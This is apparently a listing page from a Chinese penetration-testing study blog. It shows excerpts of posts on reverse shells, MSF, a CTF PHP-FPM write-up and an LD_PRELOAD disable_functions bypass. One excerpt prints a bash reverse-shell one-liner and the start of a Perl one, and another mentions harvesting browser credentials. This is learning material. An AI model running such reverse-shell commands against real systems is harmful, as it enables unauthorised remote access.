内网走出之–反弹shell|内网渗透学习(五)
主要内容就是Windows各种工具加载payload执行命令反弹shell, Linux部分和以前学习的差不多, 不过也有点东西值得一看
|
|
|
1,260
2406 字
|
12 分钟
使用msf接收反弹shell|内网渗透学习(一)
使用msf接收反弹shell|内网渗透学习(一) 这里的内网渗透学习(一)~(三)的文章都是第一节MSF反弹shel收集信息的内容, 所以这三篇文章对标题的限定并不是那么的严格, 直接连着看下来的话就比较好理解了 内网信息收集思路 系统管理员密码 用户session, 3398, ipc链接记录, 用户回收站信息收集 浏览器账号密码和cookie获…
|
|
|
1,159
499 字
|
3 分钟
[蓝帽杯 2021]One Pointer PHP | BUU
[蓝帽杯 2021]One Pointer PHP 虽然这个比赛只有一个Web题但是质量确实挺高的,值得用一篇文章来记录一下 这道题主要核心内容就是打PHP-FPM服务的原理和方法 One Pointer PHP 解题步骤 设置数组溢出 使用FTP被动连接打php-FPM SUID提权 0x01 PHP数组溢出 题目代码内容不多 //user.ph…
|
|
|
636
2829 字
|
31 分钟
LD_PRELOAD 后门 | bypass disable_functions
LD_PRELOAD 后门 用途 主要是用于绕过 disable_functions ,本质上是加载顺序的问题, 动态链接库加载过程中会先加载 LD_PRELOAD 指向的变量,这样我们可以利用这个先加载来进行劫持正常的函数和命令 只要劫持系统命令调用的一个函数就可以在劫持函数任意执行其它函数从而绕过disable_functions 劫持命令调用…
|
|
|
693
1680 字
|
8 分钟
反弹shell工具(2)
利用netcat反弹shell Netcat 是一款简单的Unix工具,使用UDP和TCP协议。 它是一个可靠的容易被其他程序所启用的后台操作工具,同时它也被用作网络的测试工具或黑客工具。 使用它你可以轻易的建立任何连接。 目前,默认的各个linux发行版本已经自带了netcat工具包,但是可能由于处于安全考虑原生版本的netcat带有可以直接发布…
|
|
|
1,278
1638 字
|
10 分钟
反弹shell工具(1)
Bash 与linux发行版本有关 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 PERL perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobynam…
|
|
|
617
139 字
|
1 分钟内